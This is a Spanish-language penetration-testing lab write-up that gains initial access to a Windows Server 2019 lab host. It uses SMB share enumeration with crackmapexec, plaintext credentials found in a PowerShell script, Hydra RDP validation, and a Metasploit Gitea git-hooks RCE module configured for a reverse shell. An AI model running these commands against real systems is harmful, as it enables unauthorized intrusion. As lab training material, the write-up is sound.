Acceso Inicial a Windows - Explotación de Gitea y SMB

#windows #initial-access #gitea #smb #rdp #rce #metasploit #pentesting

🎯 Objetivo

Obtener acceso inicial a un sistema Windows Server 2019 Standard (x64) utilizando la información recopilada durante la fase previa de reconocimiento.

🔍 Resumen de Información Descubierta

💻 Sistema: Windows Server 2019 Standard (x64)
🧱 Servicios detectados:
- ⚙️ Gitea v1.12.4 (Go 1.14.8)
- 📂 SMBv1 habilitado ⚠️
- 🧑‍💻 Cuenta Guest activa (con permisos limitados)
🧩 Sesión NULL (anónima): accesible, pero con restricciones.
📁 Recurso compartido detectado: Devs
🧠 Indicios de entorno de desarrollo o administración interna.

🔧 Explotación del Servicio SMB

SMB — Server Message Block

Es un protocolo usado para compartir archivos e impresoras. Versiones antiguas (como SMBv1) son vulnerables a exploits como EternalBlue (CVE-2017-0144).

Usamos las credenciales encontradas previamente en el sistema Linux:

Usuario: john  
Contraseña: SuperSecurePass123

🕷️ Enumeración del recurso compartido (SMB Spider)

crackmapexec smb 10.129.230.148 -u "john" -p 'SuperSecurePass123' --spider Devs --pattern .

🔎 Resultado:

Pasted image 20251005180744.png

✅ Credenciales válidas → acceso de lectura al recurso compartido Devs.

📥 Descarga del archivo encontrado

crackmapexec smb 10.129.12.20 -u "john" -p 'SuperSecurePass123' --share Devs --get-file tmp.ps1 tmp.ps1

📁 Archivo transferido: tmp.ps1
💡 Tipo de archivo: Script de PowerShell.

🔍 Análisis del Script PowerShell

nvim tmp.ps1

📜 Contenido relevante:

Pasted image 20251005181015.png

⚠️ Credenciales incrustadas

El script contiene el usuario y la contraseña en texto plano — una práctica insegura, pero muy útil para nosotros.
Además, confirma la reutilización de contraseñas, una falla común en entornos corporativos.

🧪 Validación de Credenciales (RDP)

💡 RDP (Remote Desktop Protocol) permite acceso remoto gráfico.

Si las credenciales son válidas, obtendremos acceso directo al escritorio de Windows.

Probamos las credenciales con Hydra:

hydra -l john -p "SuperSecurePass123" rdp://10.129.230.148

📊 Resultado:

Pasted image 20251005181128.png

✔️ Confirmadas credenciales válidas para RDP.

🧨 Explotación de Gitea (RCE con Metasploit)

Gitea v1.12.4

Versión vulnerable a ejecución remota de código (RCE) mediante git hooks inseguros.
Vulnerabilidad mitigada a partir de la v1.13.0.

🔎 Buscar exploits disponibles:

msfconsole -q
search  Gitea 
info 9

{F3902FA0-E890-4062-99F6-F0602EBA2C03}.png
📘 Exploit relevante:

exploit/multi/http/gitea_git_hooks_rce

⚙️ Configuración del exploit

use exploit/multi/http/gitea_git_hooks_rce
set LHOST tun0
set RHOSTS 10.129.12.20
set RPORT 3000
set USERNAME john
set PASSWORD SuperSecurePass123
set TARGET 3
run

🎯 Proceso del exploit:

🔑 Autenticación con usuario john
🧩 Creación de repositorio temporal
🪝 Inyección de git hook malicioso
⚙️ Activación → ejecución del payload
🔄 Conexión inversa establecida

📡 Resultado:

{C8FAEB15-1254-4113-8182-00E5EAB68ACA}.png

💥 ¡Shell inversa obtenida!

💻 Conexión RDP Establecida

Para una sesión gráfica más estable:

xfreerdp /u:john /p:"SuperSecurePass123" /v:10.129.12.20 /w:1366 /h:768

📺 Salida en PowerShell:

PS C:\Users\john> whoami win01\john

✅ Confirmamos acceso como usuario john.

🧾 Resumen General

Categoría	Descripción
🖥️ SO	Windows Server 2019 Standard (x64)
⚙️ Servicios	SMB, RDP, HTTP (Gitea)
🔐 Credenciales	john / SuperSecurePass123
🧱 Vulnerabilidad	Gitea Git Hooks RCE (v1.12.4)
📂 Archivos útiles	`tmp.ps1` con credenciales
💥 Acceso logrado	Shell Meterpreter + RDP

🧠 Conclusión

🎯 Acceso Inicial Completado

Explotamos una configuración insegura de Gitea y credenciales reutilizadas.
Confirmamos validez mediante Hydra y logramos acceso RDP directo.
Este acceso nos permitirá realizar movimiento lateral y preparar la escalada de privilegios en próximas etapas.